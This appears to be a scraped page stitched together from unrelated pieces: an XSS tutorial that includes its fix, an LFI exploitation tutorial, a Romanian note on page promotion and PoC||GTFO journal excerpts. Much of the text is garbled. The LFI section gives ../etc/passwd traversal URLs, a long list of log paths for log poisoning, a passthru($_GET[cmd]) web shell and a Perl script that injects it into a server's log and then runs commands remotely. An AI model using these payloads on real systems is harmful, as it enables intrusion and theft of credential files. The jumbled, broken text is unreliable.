'submitcomment' value = 'Post Comment'> </ form> So again, to the normal user Would this look just like a normal comment section. In reality these symbols is not being sanitized Correctly comments. As you can see the comment I posted is now red. This is very bad, people can now input Their own HTML Where it is Stored in the DB and displayed to anyone That That article looks at. That goes to anyone Now That article That Will see alert box. This is a serious issue. THES is obviously not what attackers Would do though. Would THEY embed Their payload with a legit comment and you Would Never Even Know You hit it UNLESS you view the source. Now When someone Would That view article Would THEY see nothing fishy, But Would THEY have executed the attackers payload. If you inspect element the comment you can see the JavaScript That is getting executed. This is a huge issue and many innocent people Makes Victims and open for attack Even without realizing what Happened. Let's take a look at Where the vulnerability occurs. while ($ c = mysql_fetch_array ($ get_comments)) { $ comment = $ c ['comment']; echo "$ comment <hr>"; } Right there is Where the code is fetching the comments from the database and displaying Them to the user. The comments have not being sanitized Properly Before being echo'd out to the users. Again we can use htmlspecialchars or htmlentities to sanitize the comments. while ($ c = mysql_fetch_array ($ get_comments)) { $ comment = htmlspecialchars ($ c ['comment']); echo "$ comment <hr>"; } Or while ($ c = mysql_fetch_array ($ get_comments)) { $ comment = htmlentities ($ c ['comment']); echo "$ comment <hr>"; } You can now see That the payload is no longer getting Treated as HTML therefore not getting executed. Keep in mind these symbols is just very simple examples I wrote up for this thread. Next time you have a web app writing or working on Something please keep in mind these symbols. THES has always overlooked Which is probably Why They are so common. You can come Across these symbols everywhere! I was recently doing work for a client and found about 12 XSS vulnerabilities. 8 or 10 of Them being persistent in Their dashboard. Which Meant Could someone have inputted the cookie stealer and wait for Them to load the page in the dashboard with the stealer. Then logged into Their panel for Them Which Would BE BAD THEY WERE STORING considering personal information of Customers there. If You Would like me to disclose my Findings in That project let me know and I will be glad to. Anyway, I hope you understand more about Some of XSS now and how to Prevent it. It's a very easy thing to Prevent, But at the same time people always forget about it. Anything I missed or if you have Anything to add feel free to post it here. Source: madleets

In this tutorial you'll learn how how to exploit a vulnerable LFI site. First of all let's have a look at this small PHP code: PHP Code : < ? php $ page = $ _GET [page ] ; include ( $ page ) ; ? > This is a code should not be never used again, because is vulnerable to LFI, the $page variable is not sanitized. We take advantage of this vulnerability with this code : site.host / index.php page = . . / . . / . . / . . / . . / . . / . . / etc / passwd If the site is hosted Unix users passwords are stored in / etc / passwd and the above code shows the passwords and usernames . Now all you have to do is to decode the password. An encrypted password should look like: username: x : 503:100 : fullname :/ home / username :/ bin / sh In this example , the password is x , as another example of the password : username ! : 503:100 : fullname :/ home / username :/ bin / sh Other " places " where you can find passwords out of / etc / passwd it's about : / etc / shadow / etc / group / etc / security / group / etc / security / passwd / etc / security / user / etc / security / environ / etc / security / limits In case the browser will show a late inclusion . Php ( and automatically. / Etc / passwd.php not exist ) , add to sf including server will skip all write . site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd We try to run the commands in the log server injecting php code, then coiling them . Some addresses log : . . / apache / logs / error.log . . / apache / logs / access.log . . / . . / apache / logs / error.log . . / . . / apache / logs / access.log . . / . . / . . / apache / logs / error.log . . / . . / . . / apache / logs / access.log . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces_log . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces.log . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error.log . . / . . / . . / . . / . . / . . / . . / var / www / logs / access_log . . / . . / . . / . . / . . / . . / . . / var / www / logs / access.log . . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access_log . . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access.log . . / . . / . . / . . / . . / . . / . . / var / log / apache / access_log ../../../../../../../var/log/apache2/access_log . . / . . / . . / . . / . . / . . / . . / var / log / apache / access.log ../../../../../../../var/log/apache2/access.log . . / . . / . . / . . / . . / . . / . . / var / log / access_log . . / . . / . . / . . / . . / . . / . . / var / log / access.log . . / . . / . . / . . / . . / . . / . . / var / www / logs / error_log . . / . . / . . / . . / . . / . . / . . / var / www / logs / error.log . . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error_log . . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error.log . . / . . / . . / . . / . . / . . / . . / var / log / apache / error_log ../../../../../../../var/log/apache2/error_log . . / . . / . . / . . / . . / . . / . . / var / log / apache / error.log ../../../../../../../var/log/apache2/error.log . . / . . / . . / . . / . . / . . / . . / var / log / error_log . . / . . / . . / . . / . . / . . / . . / var / log / error.log site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd Ok , now let 's look at the log that saves pages that do not exist and the following code : < ? passthru ( \ $ _GET [ cmd ] ) ? > . If we write in the browser: site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? > We'll obviously show a page that says that this code does not exist on the server, because the browser automatically encode the URL and the page that we have reached a browser translates to: site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? > So you have to do something else ... We use the following perl script : #! / usr / bin / perl -w use IO :: Socket ; use LWP :: UserAgent ; $ site = " victim.com " $ path = " / folder / " ; $ code = "<? passthru ( \ $ _GET [ cmd ] ) ? > " ; $ log = " . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log " ; print " Trying to inject the code" ; $ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n"; print $ socket " GET " . $ path . $ code . " HTTP/1.1 \ r \ n"; print $ socket "User -Agent " . $ code . "\ r \ n"; print $ socket "Host : " . $ site . "\ r \ n"; print $ socket "Connection : close \ r \ n \ r \ n"; close ( $ socket) ; print " \ nCode $ code sucssefully injected in $ log \ n"; print " \ nType command to run or exit to end: " ; $ cmd = <STDIN> ; while ($ cmd ! ~ "exit" ) { $ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n"; ****print $ socket " GET " . $ path . " index.php = ' . $ log . " & cmd = $ cmd HTTP/1.1 \ r \ n "; ****print $ socket "Host : " . $ site . "\ r \ n"; ****print $ socket " Accept: * / * \ r \ n"; ****print $ socket "Connection : close \ r \ n \ n"; ****while ($ show = <$ socket > ) ****{ ********print $ show ; ****} print " Type command to run or exit to end: " ; $ cmd = <STDIN> ; } Source: madleets

Fa reclama pe diferite site-uri. Incearca sa iei legatura cu prieteni sa iti promoveze pagina. Vorbeste cu altii administratori de pagini sa va faceti reclama reciproc. Cauta oameni dispusi sa posteze pe pagina (Editori)

So, plug everything in, attach an external power supply to the graphics card, power it up, and. . . nothing. Or so it would seem. But, we’ve got a serial console on the Galileo, so we can check it out by running lspci. And there we have it! An Nvidia 0x10de standing out in a sea of Intel 0x8086. Our graphics card is connected, enumerated, and waiting for drivers. 7.3 Solemnization through Software On a normal desktop, the BIOS starts up, runs the video BIOS that initializes the display, and gets on with things. But this is supposed to be a tiny embedded system. While it does boot via EFI, it doesn’t run video BIOS or any option ROMs. We’ll have to that by hand. There’s already great instructions by Sergey Kiselev on how to build your own Linux for Galileo available.11 I mostly followed those to get a standard install working, but I had to make two changes between steps 7 and 8 of Kiselev’s tutorial. We need to add all the X11 related packages, and we need to enable nouveau, the open-source Nvidia drivers, in our kernel configuration. 7 . 1 . Add ‘ ‘ x11 ’ ’ t o the DISTRO\_FEATURES l i n e i n 2 meta?cl a n t o n \_vxxxx/meta?cl an t on?d i s t r o / c o n f / d i s t r o / cl an t on ?ti n y . c o n f 7 . 2 . C o n fi g u r e the k e r n el by runnin g ‘ ‘ bi t b a k e li n u x ?yocto?cl a n t o n ?c 4 menucon fig ’ ’ and e n a bli n g nouveau under d ri v e r s ?>g r a p hi c s ?>nouveau Copy the resulting files to a MicroSD card, pop it in your Galileo, and you are a modprobe nouveau && startx away from what might be the most inefficient way to drive a display ever devised. Of course, there’s no window manager or input devices yet configured, so you can’t do much, but that’s just a software problem, right? Read more to PoC || GTFO 0x05 1 Sacrament of Communion with the Weird Machines Neighbors, please join me in reading this seventh release of the International Journal of Proof of Concept or Get the Fuck Out, a friendly little collection of articles for ladies and gentlemen of distinguished ability and taste in the field of software exploitation and the worship of weird machines. If you are missing the first six issues, we the editors suggest pirating them from the usual locations, or on paper from a neighbor who picked up a copy of the first in Vegas, the second in S˜ao Paulo, the third in Hamburg, the fourth in Heidelberg, or the fifth in Montr´eal, or the sixth in Las Vegas. This release is dedicated to Jean Serri`ere, F8CW, who used his technical knowledge and an illegal shortwave transceiver to fight against the Nazi occupation of France. His wife Alice Serri`ere once, when asked “Where are the tubes?” showed occupying soldiers the leaky pipes in their basement. In Section 2, the Pastor reminds us that there are things that we must be thankful for, with a parable freshly drawn from the Intertubes. In Section 3, Fiora shares with us a collection of nifty tricks necessary to emulate modern Nintendo Gamecube and Wii hardware both quickly and correctly. Tricks involve fancy MMU emulation, ways to emulate PowerPC’s bl/blr calling convention without confusing an X86 branch predictor, and subtle bugs that must be accounted for accurate floating point emulation. Continuing the tradition of getting Adobe to blacklist our fine journal, pocorgtfo06.pdf is a TAR polyglot, which contains two valid PoC, as in both Pictures of Cats and Proofs of Concept. In Section 4, Ange Albertini explains how this sleight of hand is performed. In Section 5, Micah Elizabeth Scott shares the story of the Pong Easter Egg that hides in VMWare and the Pride Easter Egg that hides inside that! In Section 6, Craig Heffner shares two effective tricks for detecting that MIPS code is running inside of an emulator. From kernel mode, he identifies special function registers that have values distinct to Qemu. From user mode, he flushes cache just before overwriting and then executing shellcode. Only on a real machine—with unsynchronized I and D caches—does the older copy of the code execute. In Section 7, Philippe Teuwen extends his coloring book scripts from PoCkGTFO 5:3 to exploit the AngeCryption trick that first appeared in PoCkGTFO 3:11. In Section 8, Joe Grand presents some tricks for reverse engineering printed circuit boards with sand paper and a flatbed scanner. Continuing this issue’s theme of tricks that allow or frustrate debugging and emulation, Ryan O’Neill in Section 9 describes the internals of his Davinci self-extracting executables in Linux. Here you’ll learn how to prevent your process from being easily debugged, sidestepping LD_PRELOAD and ptrace(). In Section 10, Don A. Bailey treats us to a fine bit of Vuln Fiction, describing a frightening Internet of All Things run by a company not so different from one that shipped a malicious driver last month. Finally, in Section 11 we pass around the old collection plate, because—in the immortal words of St. Herbert—the PoC must flow! Read more to PoC || GTFO 0x06